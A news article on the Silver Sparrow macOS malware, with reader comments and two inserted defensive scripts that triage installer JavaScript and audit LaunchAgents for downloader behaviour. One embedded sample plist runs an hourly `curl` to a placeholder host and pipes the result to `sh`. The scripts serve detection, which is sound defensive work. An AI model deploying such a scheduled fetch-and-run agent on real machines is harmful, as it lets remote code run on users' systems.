Mysterious malware infecting Apple Silicon Macs has no payload - yet

Posted in macOS, edited February 2021
More malware affecting Apple Silicon Macs has been uncovered, but researchers have spotted that it is lacking a malicious payload, for the moment.




It seems there may be more malware aimed at Apple's M1-based Macs than previously thought. Following the initial reports of the first M1-native malware found in the wild, more infections have turned up, though of a particularly toothless variety.

Early in February, researchers from Red Canary discovered a strain of macOS malware that, like many other families, uses a LaunchAgent to persist on the system. What caught the researchers' interest was that it behaved differently from typical adware, because of how it used JavaScript for execution.

The malware cluster, which the researchers named "Silver Sparrow," also included a binary compiled natively for M1 chips, making it malware that could potentially target Apple Silicon Macs.

Further work with researchers at VMware Carbon Black and Malwarebytes determined that Silver Sparrow was likely a "previously undetected strain of malware." As of February 17, it had been detected on 29,139 macOS endpoints across 153 countries, with the bulk of infections in the US, the UK, Canada, France, and Germany.

At the time of publication, the malware had not delivered a malicious payload to victim Macs, though that could change. Because of its M1 compatibility, its "relatively high infection rate" and its operational maturity, the researchers judged it a serious enough threat, one "uniquely positioned to deliver a potentially impactful payload at a moment's notice," to warrant public disclosure.

Two versions of the malware were discovered. One carried a binary compiled for Intel-based Macs only, while the other carried a binary compiled for both Intel and M1 architectures. These binaries appear to be placeholders: the first opens a window that literally says "Hello, World!" and the second one that says "You did it!"

An example of the included binary [via Red Canary]


Were the bundled binary actually malicious, that universal build would let the same or similar payload instructions run natively on both architectures from a single executable.

The mechanism for the malware revolves around files titled "update.pkg" and "updater.pkg," which pose as installers. They take advantage of the macOS Installer JavaScript API to execute their suspicious commands.

Running commands this way is occasionally seen in legitimate software but is unusual for malware, which usually relies on preinstall or postinstall scripts for command execution.
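The practical check that follows from the two paragraphs above is to expand a suspect package and read its Distribution file rather than only its preinstall/postinstall scripts. The script below is an added example written for this article, not Red Canary's tooling: it parses a Distribution XML, lists the hooks the Installer evaluates automatically, and reports any JavaScript that calls the Installer API's `system.run` or `system.runOnce`. Both Distribution documents embedded in it are constructed for illustration and are not copied from the real Silver Sparrow packages.

```python
"""Triage the Distribution file of a macOS installer package for JavaScript
that runs commands through the Installer JavaScript API.

Added example for this article; it is not Red Canary's tooling and the two
Distribution documents below are constructed for illustration, not copied
from the actual Silver Sparrow packages.
"""
import re
import sys
import xml.etree.ElementTree as ET

# Constructed: a Distribution whose installation-check hook runs a shell
# command via system.run, so the command executes as soon as the user clicks
# through the installer, before any payload is written to disk.
SUSPICIOUS_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="2">
    <title>Updater</title>
    <installation-check script="installationCheck()"/>
    <script>
<![CDATA[
function installationCheck() {
    system.run('/bin/sh', '-c', 'echo hello > /tmp/marker');
    return true;
}
]]>
    </script>
    <choices-outline><line choice="default"/></choices-outline>
    <choice id="default" title="Updater"/>
</installer-gui-script>
"""

# Constructed: the same hook used the way legitimate packages use it, to gate
# installation on a version check with no command execution at all.
BENIGN_DISTRIBUTION = """<?xml version="1.0" encoding="utf-8"?>
<installer-gui-script minSpecVersion="2">
    <title>Updater</title>
    <installation-check script="installationCheck()"/>
    <script>
<![CDATA[
function installationCheck() {
    return system.compareVersions(system.version.ProductVersion, '10.15') >= 0;
}
]]>
    </script>
    <choices-outline><line choice="default"/></choices-outline>
    <choice id="default" title="Updater"/>
</installer-gui-script>
"""

# system.run / system.runOnce are the Installer JavaScript API calls that
# execute an arbitrary program; this regex captures each call with its
# argument list (it stops at the first ')', so a ')' inside an argument would
# truncate the capture, which is acceptable for triage).
COMMAND_CALL_RE = re.compile(r"system\.run(?:Once)?\s*\([^;]*?\)\s*;?", re.S)

# Hooks the Installer evaluates automatically during the GUI flow.
AUTO_HOOKS = ("installation-check", "volume-check")


def script_blocks(distribution_xml: str) -> list[str]:
    """Return the text of every <script> element (CDATA included)."""
    root = ET.fromstring(distribution_xml)
    return [el.text or "" for el in root.iter("script")]


def command_calls(js: str) -> list[str]:
    """Return each system.run / system.runOnce call found in a script body."""
    return [m.group(0).strip() for m in COMMAND_CALL_RE.finditer(js)]


def triage(distribution_xml: str) -> dict:
    """Summarise which auto-run hooks exist and whether any script runs commands."""
    root = ET.fromstring(distribution_xml)
    hooks = {}
    for tag in AUTO_HOOKS:
        el = root.find(tag)
        if el is not None and el.get("script"):
            hooks[tag] = el.get("script")
    calls = [c for block in script_blocks(distribution_xml) for c in command_calls(block)]
    return {"hooks": hooks, "command_calls": calls, "suspicious": bool(calls)}


if __name__ == "__main__":
    # Usage: pkgutil --expand update.pkg /tmp/expanded
    #        python3 triage.py /tmp/expanded/Distribution
    path = sys.argv[1] if len(sys.argv) > 1 else None
    xml_text = open(path, encoding="utf-8").read() if path else SUSPICIOUS_DISTRIBUTION
    result = triage(xml_text)
    print("auto-run hooks:", result["hooks"])
    for call in result["command_calls"]:
        print("command execution:", call)
    print("verdict:", "SUSPICIOUS" if result["suspicious"] else "no command execution found")
```

The point of the benign sample is that an installation-check hook by itself is not an indicator; plenty of legitimate packages use it for version gating. What separates the two is whether the script body reaches for `system.run`, which is why the verdict keys on the command calls rather than on the presence of JavaScript.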

Once installed, the infection checks a specific URL for a downloadable file, which could contain further instructions or a final payload. A week of monitoring produced no visible final payload, though that could still change.
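Taken together with the LaunchAgent persistence mentioned earlier, this describes a downloader: a per-user agent that keeps running and pulls a file from a fixed URL. The script below is an added example for this article, not Red Canary's detection logic. It parses LaunchAgent plists and flags the combination of a schedule and a remote fetch. The two plists it embeds are constructed for illustration; the label, the URL, the paths and the hourly StartInterval are assumptions rather than values taken from the real sample.

```python
"""Audit user LaunchAgents for the pattern described above: an agent that runs
on a schedule and pulls a file from a remote URL.

Added example for this article, not Red Canary's detection logic. Both plists
below are constructed for illustration; the URL, label, paths and the hourly
StartInterval are assumptions, not values taken from the real sample.
"""
import plistlib
import re
from pathlib import Path

# Constructed: a per-user agent that every hour (StartInterval 3600) fetches a
# file over HTTPS and hands whatever it got to sh.
DOWNLOADER_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>updater.agent</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/sh</string>
        <string>-c</string>
        <string>curl -s https://example.invalid/updater/version.json -o /tmp/version.json &amp;&amp; sh /tmp/version.json</string>
    </array>
    <key>RunAtLoad</key><true/>
    <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""

# Constructed: an ordinary helper agent that only starts at login.
HELPER_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.helper</string>
    <key>ProgramArguments</key>
    <array><string>/Applications/Example.app/Contents/MacOS/helper</string></array>
    <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

URL_RE = re.compile(r"https?://[^\s'\"]+")
SHELLS = {"sh", "bash", "zsh"}
FETCH_TOOLS = ("curl", "wget")


def audit_agent(plist_bytes: bytes) -> dict:
    """Describe what a LaunchAgent does and flag the scheduled-fetch pattern."""
    agent = plistlib.loads(plist_bytes)
    args = list(agent.get("ProgramArguments") or [])
    if not args and agent.get("Program"):
        args = [agent["Program"]]
    cmdline = " ".join(str(a) for a in args)

    scheduled = bool(agent.get("StartInterval") or agent.get("StartCalendarInterval"))
    urls = URL_RE.findall(cmdline)
    fetches = bool(urls) and any(tool in cmdline for tool in FETCH_TOOLS)

    findings = []
    if scheduled:
        findings.append("runs on a schedule")
    if agent.get("RunAtLoad"):
        findings.append("runs at login")
    if args and Path(args[0]).name in SHELLS:
        findings.append("program is a shell interpreter")
    if fetches:
        findings.append("fetches remote content: " + ", ".join(urls))

    # A timer plus a remote fetch is a downloader/beacon regardless of how
    # innocuous the label looks; that combination is what gets flagged.
    return {"label": agent.get("Label"), "findings": findings, "suspicious": scheduled and fetches}


def audit_directory(directory: Path) -> list[dict]:
    """Audit every .plist in a LaunchAgents folder, e.g. ~/Library/LaunchAgents."""
    return [audit_agent(p.read_bytes()) for p in sorted(directory.glob("*.plist"))]


if __name__ == "__main__":
    for result in audit_directory(Path.home() / "Library" / "LaunchAgents"):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['label']}: {'; '.join(result['findings'])}")
```

Run it against `~/Library/LaunchAgents` on the machine in question (the same logic applies to `/Library/LaunchAgents` and `/Library/LaunchDaemons` with root). The verdict deliberately ignores the label and file names, since those are whatever the author chose; what it keys on is behaviour that survives renaming: a schedule plus a fetch tool plus a URL in the command line.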

Several questions about Silver Sparrow remain unanswered for the researchers, including where the initial PKG files used to infect systems came from, and why elements of the malware's code appear to be part of a wider toolset.

"The ultimate goal of this malware is a mystery," Red Canary admits. "We have no way of knowing with certainty what payload would be distributed by the malware, if a payload has already been delivered and removed, or if the adversary has a future timeline for distribution."

There is also the question of why the "Hello World" executables are included at all, since the binary does not run automatically and would only execute if a victim actively sought it out and launched it. The executables suggest the malware is still under development, or that an application bundle was needed to make the package look legitimate to other parties.

Comments

  • Reply 1 of 14
    Javascript: Second only to Flash as a vector for malware and viruses. Wasn't it supposed to be ultra secure? I could have sworn that was the reason given for why it was created in the first place.
  • Reply 2 of 14
    Every article about how M1 is now a malware target is stupid clickbait. In none of these cases is the M1 chip exhibiting a vulnerability, other than macOS’ ability to cause code to be run upon it. It’s macOS that’s suffering the vulnerability, the same macOS that also runs on Intel. A compiler target architecture is not remotely the same thing as an exploitable hardware target. It’s just a command line flag. It can’t possibly be news that a malware author changed a compiler flag — Xcode practically begs all developers to also target Apple Silicon. Apple never implied the M1 would be in any way more resistant to malware than Intel processors, and they bent over backward to make sure Intel code could run alongside natively compiled M1 code to make the processor as irrelevant as possible. Please be responsible journalists and just write a single article stating the M1 is no more or less vulnerable to malware, and leave these “Apple Silicon vulnerability” framings to less reputable blogs.
  • Reply 3 of 14
    Javascript: Second only to Flash as a vector for malware and viruses. Wasn't it supposed to be ultra secure? I could have sworn that was the reason given for why it was created in the first place.

    JavaScript isn’t the issue here. It’s an incidental bystander to the crime. The installer package happens to (reasonably) allow scripts to be run as part of the install/cleanup process. Crucially, it could have been AppleScript or a bash script and done the exact same thing. The user that runs the .pkg installer file is the weak link, the insecurity, as they allowed an unsafe application to have control of their system. An installer is a foreign executable, regardless of the language in which its code is written. At no point is the JavaScript doing something it wasn’t permitted to do by the user or the system.

    Flash had myriad exploitable vulnerabilities, where unauthorized code could break free of Flash’s constraints, escalate privilege and run on the native system. This isn’t like that. Particular JavaScript virtual machines/interpreters may have similar vulnerabilities, but this isn’t one of those cases. This is more like welcoming the bad guys in directly.
  • Reply 4 of 14
    Thanks to the author for not including any info on how to detect if one is compromised.  That's certainly not something anyone here would care about.
  • Reply 5 of 14
    bonobob said:
    Thanks to the author for not including any info on how to detect if one is compromised.  That's certainly not something anyone here would care about.
    Exactly. After scaring the shit out of everyone it would be great if AI would provide clear information on how to detect and remove it. Even over at Ars Technica they’re being lazy by just pointing to the researchers’ website, which may be too technical for most people to wade through.
  • Reply 6 of 14
    bonobob said:
    Thanks to the author for not including any info on how to detect if one is compromised.  That's certainly not something anyone here would care about.
    It may be easy to detect. Look at your Downloads folder. If you have the habit of frequently visiting piracy and other dark sites, you may find plenty of .zip, .pkg and .dmg files in that folder. Although Safari no longer downloads anything automatically, an explicit permission given by the user to download from "that site" will still do it. If the "Open safe files after downloading" option is active in Safari then the malware installer will also launch automatically. 

    Besides that, looking for some exotic and mysterious methods of contamination wouldn't help much. Malware in macOS spreads almost always through the weakest link in the security chain: the user.
  • Reply 7 of 14
    Javascript: Second only to Flash as a vector for malware and viruses. Wasn't it supposed to be ultra secure? I could have sworn that was the reason given for why it was created in the first place.
    Java is more secure than C/C++ but that wasn't the reason it was created (which was to achieve platform-agnostic code for the web). Javascript was never created for security at all. It was created solely to make web browsers/websites interactive. Security was never a consideration and efforts to make Javascript more secure came down the line. However, there are so many known security issues in Javascript because it is so widespread ... in terms of end user interaction the most popular in the world by far. Makes it a huge target so naturally everyone with a bow and arrow is going to take their shot.
  • Reply 8 of 14
    I'm not infected. I'm guessing it's related to a Flash update! Gotta update Flash!  :D
  • Reply 9 of 14
    tobian said:
    Toothless Intel investing in down-punching further? Perhaps it’s less expensive, than research better CPUs?
  • Reply 10 of 14
    In my opinion, from Intel chips made in US, EU or Middle East foundries, I would only use the chips made in US or EU, since Intel is in the deep hole it is right now due to the Middle East "advisers" spending ~$25 billion from 2016 to today with near nothing showing for it except luxury condos, yachts, jets & sports cars in the Middle East..... and oh yes! malware loaded chips. Let's hope the new Intel team turns around the ship fast & smart towards Holograms, Augmented Reality, Neurons, Hydrogen & Plasma & Gravity, etc.
  • Reply 11 of 14
    I would only use the chips made in US or EU 
    I would try to avoid all products made in dictatorships. Not just computer chips, but potato chips, cars, cutlery and everything else. I always look on the labels of products, and am always happy to pay more for products made where people are free and human rights are honoured. It's not always easy or possible to do this, however, for several reasons, including the fact that some products have components from a variety of countries, and also because it can be hard to distinguish between a company's HQ's location and its employees' or contractors' locations.

    People would be surprised to learn how many food products come from China, for example. And the law in Canada says that a food product can be labelled "made in Canada" if at least 51% of the price of the final product was spent in Canada. The loophole is that that price includes the price of the packaging. So in many cases food that is grown in China is labelled "made in Canada".

    In my life I have never yet met another person who shares this value of mine. I've heard many people who take pride in buying products from their own country, but never people who take pride in buying from "free countries." So I'm braced for a lot of critics here.
  • Reply 12 of 14
    Having 'known' malware covered in the press as a point of concern would be a real luxury in PC-land.

    Microsoft I believe see 94% of threats once. For Windows it's all about protection against software vulnerabilities and zero-day.

    There is feedback from VMware and Malwarebytes so it's clearly a known threat in the AV vendor community.

    All this really is then is a reminder to macOS owners (including myself) that they need some form of decent malware protection now.

    History has shown us that trusting hardware and OS vendors exclusively is insufficient.
  • Reply 13 of 14
    bonobob said:
    Thanks to the author for not including any info on how to detect if one is compromised.  That's certainly not something anyone here would care about.
    The article has an easily missed link (it took me three passes, while looking for it) to the researcher’s article, which finally gets around to those details:

    https://redcanary.com/blog/clipping-silver-sparrows-wings/
  • Reply 14 of 14
    asdasd said:
    The M1 mention is mostly clickbait as this kind of exploit works on many macs. 

    To get infected you have to: 

    1) not download from the App Store exclusively. 
    2) accept random downloads from a website or turn the option for auto download from that specific website. 
    3) turn on auto Launch for that website or go to the downloads folder and double click the pkg
    4) even then it won’t work unless you have disabled security settings to allow any application to launch, as opposed to App Store or known developers. You can only do this on an M1 (Big Sur) Mac via the command line. 

    This is no threat to normal users. How did it even spread? 